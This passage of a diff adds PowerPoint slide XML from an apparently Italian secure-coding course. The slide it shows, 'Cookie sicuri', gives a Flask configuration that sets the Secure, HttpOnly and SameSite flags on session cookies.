+            <a:pPr algn="r"/>
+            <a:r>
+              <a:rPr sz="1000" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>L5  ·  10/14</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Rectangle 1"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="0"/>
+            <a:ext cx="12191695" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="0F2D52"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="164592"/>
+            <a:ext cx="9144000" cy="502920"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="2200" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Cookie sicuri</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="9784080" y="164592"/>
+            <a:ext cx="2194560" cy="457200"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 8000"/>
+            </a:avLst>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="06A77D"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="TextBox 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="9784080" y="164592"/>
+            <a:ext cx="2194560" cy="457200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="1200" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>✅ PYTHON</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="Rectangle 5"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1097280"/>
+            <a:ext cx="11247120" cy="365760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="2D2D37"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Oval 6"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="594360" y="1216152"/>
+            <a:ext cx="118872" cy="118872"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="FF5F56"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="Oval 7"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="777240" y="1216152"/>
+            <a:ext cx="118872" cy="118872"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="FFBD2E"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="Oval 8"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="960120" y="1216152"/>
+            <a:ext cx="118872" cy="118872"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="27C93F"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="TextBox 9"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1371600" y="1161288"/>
+            <a:ext cx="5486400" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1000" b="0" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="CBD0D8"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>  app.py  —  python</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="Rectangle 10"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1463040"/>
+            <a:ext cx="11247120" cy="4206240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="1E1E28"/>
+          </a:solidFill>
+          <a:ln w="19050">
+            <a:solidFill>
+              <a:srgbClr val="06A77D"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="Rectangle 11"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1463040"/>
+            <a:ext cx="457200" cy="4206240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="24242E"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="TextBox 12"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1051560" y="1600200"/>
+            <a:ext cx="10607040" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t># Configurazione Flask</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>app.config.update(</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>    SESSION_COOKIE_SECURE=True,      # Solo HTTPS</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>    SESSION_COOKIE_HTTPONLY=True,     # JS NON può leggerlo (anti-XSS)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>    SESSION_COOKIE_SAMESITE="Lax",    # Anti-CSRF</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>    PERMANENT_SESSION_LIFETIME=3600,</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t># Risultato:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t># Set-Cookie: session=abc;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>#             Secure; HttpOnly; SameSite=Lax;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300">
+                <a:solidFill>
+                  <a:srgbClr val="E5E5EC"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>#             Path=/; Max-Age=3600</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="14" name="TextBox 13"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="502920" y="1600200"/>
+            <a:ext cx="365760" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>2</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>4</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>5</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>6</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>7</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>8</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>9</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>10</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>11</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="r">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1100">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Consolas"/>
+              </a:rPr>
+              <a:t>12</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="15" name="TextBox 14"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="5852160"/>
+            <a:ext cx="11247120" cy="502920"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1400" b="1" i="1">
+                <a:solidFill>
+                  <a:srgbClr val="06A77D"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>✓  3 attributi + 1 config = -90% rischio session hijacking</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="16" name="Connector 15"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="6446520"/>
+            <a:ext cx="11274552" cy="0"/>
+          </a:xfrm>
+          <a:prstGeom prst="line">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln w="19050">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="17" name="TextBox 16"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="6473952"/>
+            <a:ext cx="7315200" cy="292608"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1000" b="0" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="6B7280"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="18" name="TextBox 17"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10515600" y="6473952"/>
